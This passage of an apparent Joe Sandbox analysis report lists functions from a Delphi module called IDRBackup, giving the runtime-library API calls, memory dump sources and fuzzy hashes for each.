                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 50028651
                                                                                                  • @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5002867D,?,?,?,00000000,-00000001,?,5001C6BF,00000000,5001C6EA), ref: 5002865B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$StringSystem@@$AnsiFromInternalStr$qqrr20Stringx27System@%T$us$i0$%$Sysutils@$ByteChar$qqrx20Scan$qqrpxbbStringiType$qqrx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 3411762798-0
                                                                                                  • Opcode ID: d35db2a1ea66179b42cdae8437c045958a1c07e860a6d77cbb9ac8bb00c72174
                                                                                                  • Instruction ID: a8f6eb758e1e06c8c1c440b87328b3b1e64a0ab06fc938b2605612978542ffee
                                                                                                  • Opcode Fuzzy Hash: d35db2a1ea66179b42cdae8437c045958a1c07e860a6d77cbb9ac8bb00c72174
                                                                                                  • Instruction Fuzzy Hash: 8621D234603286EF9F11CFA4F9468AD73F9EF54240B5146A6E900D7212D770DE02D790
                                                                                                  Function 500168C0 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500168EE
                                                                                                    • Part of subcall function 5001671C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                    • Part of subcall function 5001671C: @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                    • Part of subcall function 5001671C: @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 5001690C
                                                                                                    • Part of subcall function 50009EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 50009EC4
                                                                                                  • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016914
                                                                                                    • Part of subcall function 5001B48C: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120 ref: 5001B497
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 5001693A
                                                                                                  • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016942
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$FromString$Char$qqrr20StringbSysutils@$AnsiInt$qqrx20InternalStr$qqrr20Stringx20Stringx27System@%T$us$i0$%$Asg$qqrr20Cat$qqrr20CharLen$qqrr20Long$qqrx20Soundex$qqrx20Str$qqriStringiStringpbiStringriStrutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2274701456-0
                                                                                                  • Opcode ID: ac56bb5497c64dd101285ab6a25fa0cdf7d2c5530a325b6ab08d65c0f87a2b94
                                                                                                  • Instruction ID: c54646ffe945ded697551258782202c198b97f85722a43d93f103e696720e317
                                                                                                  • Opcode Fuzzy Hash: ac56bb5497c64dd101285ab6a25fa0cdf7d2c5530a325b6ab08d65c0f87a2b94
                                                                                                  • Instruction Fuzzy Hash: 6621D731E041986BDB05CBE8CC52AAEB7FEDF85200B55C3B6E84093246E6749E449690
                                                                                                  Function 50031424 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 50031445
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(00000000,00000000,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 5003144A
                                                                                                    • Part of subcall function 50031010: VariantClear.OLEAUT32(?), ref: 5003101F
                                                                                                    • Part of subcall function 50031010: @Variants@VarResultCheck$qqrl.RTL120(?,?,?,?,500310B6,50030FEB), ref: 50031024
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120(?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 5003146B
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031489
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Check$qqrlResultSystem@System@@UnicodeVariantVariants@$Asg$qqrpvpxvAsg$qqrr20ClearCopyStringStringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2751304118-0
                                                                                                  • Opcode ID: 47edba981e59826270ba9347fc8f56c62352a95c8f4581b4b0b067ba06d8f3f1
                                                                                                  • Instruction ID: ee00f14aff617dd426c24f8c2058554ec1a3e359a2800c497603794938079f51
                                                                                                  • Opcode Fuzzy Hash: 47edba981e59826270ba9347fc8f56c62352a95c8f4581b4b0b067ba06d8f3f1
                                                                                                  • Instruction Fuzzy Hash: 97116D207122908FDB22DF65D8C55CB73E6AF89750F289A67E949CB21BDA71CC41C3A1
                                                                                                  Function 50031598 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 5003162F
                                                                                                  • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031642
                                                                                                  • @Variants@@VarFromReal$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031653
                                                                                                  • @Variants@@VarFromReal$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031664
                                                                                                  • @Variants@@VarFromCurr$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031675
                                                                                                  • @Variants@@VarFromReal$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031686
                                                                                                  • @System@@WStrClr$qqrpv.RTL120(50031782,?,?,00000000), ref: 50031775
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FromVariants@@$Real$qqrv$DataxixzcInt$qqrr8$Clr$qqrpvCurr$qqrvSystem@@
                                                                                                  • String ID:
                                                                                                  • API String ID: 602775511-0
                                                                                                  • Opcode ID: 800c785c24ea6fc9281bd56c75222ecf813a92a776bb45c68f17743f7cf2494b
                                                                                                  • Instruction ID: d2296ee2ea5e4bce85cdc6a64c51ec753aedf52ee3f31da16bf47e0fe6f34f63
                                                                                                  • Opcode Fuzzy Hash: 800c785c24ea6fc9281bd56c75222ecf813a92a776bb45c68f17743f7cf2494b
                                                                                                  • Instruction Fuzzy Hash: A7219F34309E908FC7129F58D9818D973B5EB8DA80F6C8292F600CB369DA74DD44A6D2
                                                                                                  Function 5002C9C8 Relevance: 10.6, APIs: 7, Instructions: 69COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002CA02
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002C9FD
                                                                                                    • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                    • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                    • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                    • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002CA27
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002CA2C
                                                                                                  • @Sysutils@TStringBuilder@set_Length$qqri.RTL120 ref: 5002CA38
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5002CA59
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5002CA71
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSystem@@$Sysutils@$RaiseRecxiUnicode$Except$qqrvException@$bctr$qqrp20Move$qqrpxvpviRecpx14$Asg$qqrr20Builder@set_ClassClassoCreate$qqrp17Error$qqrucFormat$qqrx20Length$qqriList$qqrvLoadMetaString$qqrp20Stringpx14Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 443726296-0
                                                                                                  • Opcode ID: fc14187b7c7c042736da71d428de2dbcd4819c84bd0ff01dd216d439d3ad4659
                                                                                                  • Instruction ID: 6731962c89c81303a3c1bfd03d19d81f0425a5c77e81de43e71a57f9a9c288b4
                                                                                                  • Opcode Fuzzy Hash: fc14187b7c7c042736da71d428de2dbcd4819c84bd0ff01dd216d439d3ad4659
                                                                                                  • Instruction Fuzzy Hash: 72218330B0118A9FD710DFA8EDC1E9DB7B9AF54318F5482AAE904CB356DA31ED058BD0
                                                                                                  Function 5001A684 Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A736), ref: 5001A6C0
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A6DF
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A6F5
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A700
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001A736), ref: 5001A71B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@$System@@$String$AnsiEnsureFromStr$qqrr20String$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Copy$qqrx20InternalStringiiStringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 1585887659-0
                                                                                                  • Opcode ID: 0af96fd3c9c2fbfef1c1b0d62c2197b1e7fe4d8968c3db8f64cb212c1ac6a178
                                                                                                  • Instruction ID: d5e3eb8225a1e12af050891a21ba8373cf4462a52880f1e6278f7a9667c98c84
                                                                                                  • Opcode Fuzzy Hash: 0af96fd3c9c2fbfef1c1b0d62c2197b1e7fe4d8968c3db8f64cb212c1ac6a178
                                                                                                  • Instruction Fuzzy Hash: DC11D630A00398DFDB14DFA8DD9299DB3F8EF45200B958277E540D3166D7709F80D681
                                                                                                  Function 5002D4FC Relevance: 10.6, APIs: 7, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002D532
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002D52D
                                                                                                    • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                    • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                    • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                    • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002D555
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002D55A
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D562
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002D587
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002D58C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$String$RaiseRecxiSysutils@$Except$qqrvException@$bctr$qqrp20Recpx14Unicode$ArrayAsg$qqrr20ClassClassoCreate$qqrp17Error$qqrucFormat$qqrx20Length$qqrvList$qqrvLoadMetaString$qqrp20Stringpx14Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 3522162408-0
                                                                                                  • Opcode ID: 9cf405c63ed00766f81164b75ac821440813d4a1dc3845d93976b10434bf8ae2
                                                                                                  • Instruction ID: 47428fe981a4d071b565a4daeec592a8c0e379a3984f211a2d94abaeb810db43
                                                                                                  • Opcode Fuzzy Hash: 9cf405c63ed00766f81164b75ac821440813d4a1dc3845d93976b10434bf8ae2
                                                                                                  • Instruction Fuzzy Hash: 0811A231E05699ABDB10DFD8F8C1B9DB7B8AB14308F4081AAE90497252DA719E00CBA0
                                                                                                  Function 5002A558 Relevance: 10.6, APIs: 7, Instructions: 60windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@SafeLoadLibrary$qqrx20System@UnicodeStringui.RTL120(00000000,5002A618), ref: 5002A57F
                                                                                                    • Part of subcall function 5002B630: SetErrorMode.KERNEL32(00008000), ref: 5002B63A
                                                                                                    • Part of subcall function 5002B630: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002B684,?,00000000,5002B6A2,?,00008000), ref: 5002B663
                                                                                                    • Part of subcall function 5002B630: LoadLibraryW.KERNEL32(00000000,00000000,5002B684,?,00000000,5002B6A2,?,00008000), ref: 5002B669
                                                                                                  • GetLastError.KERNEL32(00000000,5002A618), ref: 5002A594
                                                                                                  • @Sysutils@SysErrorMessage$qqrui.RTL120(00000000,5002A618), ref: 5002A59C
                                                                                                    • Part of subcall function 50025B28: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B47
                                                                                                    • Part of subcall function 50025B28: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B69
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5002A618), ref: 5002A5BE
                                                                                                    • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                    • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                    • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                    • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5002A618), ref: 5002A5C3
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@InitializePackage$qqruipqqrui$o.RTL120(00000000,5002A5EA,?,00000000,5002A618), ref: 5002A5DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@Unicode$Sysutils@$String$ErrorLoad$RaiseRecxi$Asg$qqrr20CharChar$qqrx20ClassClassoCreate$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrp20FormatFormat$qqrx20FromInitializeLastLen$qqrr20LibraryLibrary$qqrx20List$qqrvMessageMessage$qqruiMetaModePackage$qqruipqqrui$oRecpx14SafeString$qqrp20StringpbiStringpx14StringuiStringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 3738557425-0
                                                                                                  • Opcode ID: fe5b3e8d2f5ffc72b2367006201fb38f46a8a440544c7033cdf5550ca43c16ae
                                                                                                  • Instruction ID: d7048bc2172d421995a8c02b2ad295fbd71a2bff1422e86dc26ccdf7dab828b2
                                                                                                  • Opcode Fuzzy Hash: fe5b3e8d2f5ffc72b2367006201fb38f46a8a440544c7033cdf5550ca43c16ae
                                                                                                  • Instruction Fuzzy Hash: 801108309066999FE705CFA4FC529AEBBF8EB59310F504576F504E3241DB745E00C7A0
                                                                                                  Function 5001046C Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104AC
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104B1
